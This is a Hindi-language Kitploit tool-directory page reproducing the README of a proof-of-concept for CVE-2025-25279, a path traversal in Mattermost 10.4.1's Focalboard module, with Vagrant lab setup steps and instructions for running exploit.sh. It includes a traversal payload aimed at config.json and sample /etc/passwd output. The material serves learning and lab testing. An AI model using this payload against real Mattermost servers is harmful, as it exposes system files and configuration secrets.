Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-25279-Mattermost-Path-Traversal — CVE-2025-25279 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Mattermost 10.4.1 के Focalboard मॉड्यूल में पाथ ट्रैवर्सल कमजोरी है, जो प्रमाणित उपयोगकर्ताओं को तैयार किए गए अटैचमेंट के माध्यम से मनमानी फाइलों को बाहर निकालने में सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/abokormahammadmousse/cve-2025-25279-mattermost-path-traversal
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubabokormahammadmousse/cve-2025-25279-mattermost-path-traversal

CVE-2025-25279-Mattermost-Path-Traversal

CVE-2025-25279 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Mattermost 10.4.1 के Focalboard मॉड्यूल में पाथ ट्रैवर्सल कमजोरी है, जो प्रमाणित उपयोगकर्ताओं को तैयार किए गए अटैचमेंट के माध्यम से मनमानी फाइलों को बाहर निकालने में सक्षम बनाता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
3 महीने पहलेअभी तक समीक्षित नहीं

🔥 CVE-2025-25279 — Mattermost 10.4.1

📤 Focalboard में पथ ट्रैवर्सल जो फ़ाइलों के बहिर्वहन की अनुमति देता है

🌟 प्रस्तावना

यह प्रूफ ऑफ कॉन्सेप्ट CVE-2025-25279 भेद्यता के शोषण को प्रदर्शित करता है जो Mattermost 10.4.1 को प्रभावित करती है।
Focalboard (बोर्ड प्रबंधन मॉड्यूल) में एक दोष अटैचमेंट में पथ ट्रैवर्सल के माध्यम से फ़ाइलों का मनमाना पठन की अनुमति देता है।

शोषण निम्नलिखित को बहिर्वहित करने की अनुमति देता है:

  • /etc/passwd
  • /etc/group
  • या Mattermost की संवेदनशील फ़ाइलें, उदाहरण के लिए:
    opt/mattermost/config/config.json

यह हमला केवल प्रमाणित उपयोगकर्ता खाते के साथ कमजोर परिदृश्यों में काम करता है।


🗂️ निर्देशिका संगठन

  • 📁 target : लक्ष्य बॉक्स बनाने की निर्देशिका
  • 📁 live : लक्ष्य VM और शोषण प्रदर्शन बनाने की निर्देशिका
  • 📁 src : संभावित सहायक स्रोत कोड
  • 📁 refs : लेख और ग्रंथ सूची वाली निर्देशिका
  • 📁 docs : परियोजना के दौरान उत्पादित संबंधित दस्तावेज़, वीडियो रिकॉर्डिंग सहित

🔧 पूर्वापेक्षाएँ

  • Vagrant
  • VirtualBox
  • परियोजना फ़ाइलों का सेट (target + live)
  • Mattermost खाता (PAT = Personal Access Token)
  • Bash के साथ Linux/Mac/Windows

📦 Mattermost डाउनलोड करना

target/ फ़ोल्डर शामिल नहीं है (GitHub के लिए बहुत बड़ा)।

मैन्युअल रूप से डाउनलोड करें: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz

फिर फ़ाइल को यहाँ रखें: target

VM तैनात करने से पहले

पहले target निर्देशिका में जाएं और यह करें:

root@kitploit:~
cd target
make mattermost.box

सुनिश्चित करें कि आपके पास mattermost-poc बॉक्स है अन्यथा VM काम नहीं करेगा:

root@kitploit:~
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box

1. कमजोर मशीन की तैनाती

VM चलाएँ

root@kitploit:~
cd live/vm1
vagrant up

VM से कनेक्ट करें

root@kitploit:~
 vagrant ssh

वेब इंटरफ़ेस में एक उपयोगकर्ता बनाएँ:

खोलें: http://localhost:8065

UI (उपयोगकर्ता इंटरफ़ेस) में एक टोकन बनाएँ:

प्रोफ़ाइल --> Security --> Personal Access Tokens

2. शोषण की स्थापना

होस्ट मशीन से:

root@kitploit:~
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip

chmod +x exploit.sh

3. शोषण चलाएँ

root@kitploit:~
./exploit.sh

आपसे पूछा जाएगा:

root@kitploit:~
PAT (Personal Access Token) :

👉 किसी Mattermost उपयोगकर्ता का वैध PAT दर्ज करें।

📸 आउटपुट उदाहरण (/etc/passwd का बहिर्वहन)

root@kitploit:~
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh

लक्षित फ़ाइल: config.json

Mattermost की संवेदनशील फ़ाइल को लक्षित करने के लिए:

exploit.sh स्क्रिप्ट के शीर्ष पर संशोधित करें:

root@kitploit:~
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'

शोषण तब config.json फ़ाइल की सामग्री प्रदर्शित करेगा।

✒️ लेखक

🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril

🎬 वीडियो प्रदर्शन

👉 एक पूर्ण वीडियो प्रदर्शन यहाँ स्थित है: live/Démonstration/video-poc-cve-2025-25279.mp4

🧩 नोट्स

यह PoC कड़ाई से सीखने के वातावरण के लिए है। शैक्षणिक संदर्भ के बाहर या बिना अनुमति के कभी उपयोग न करें।

टूल डाउनलोड करें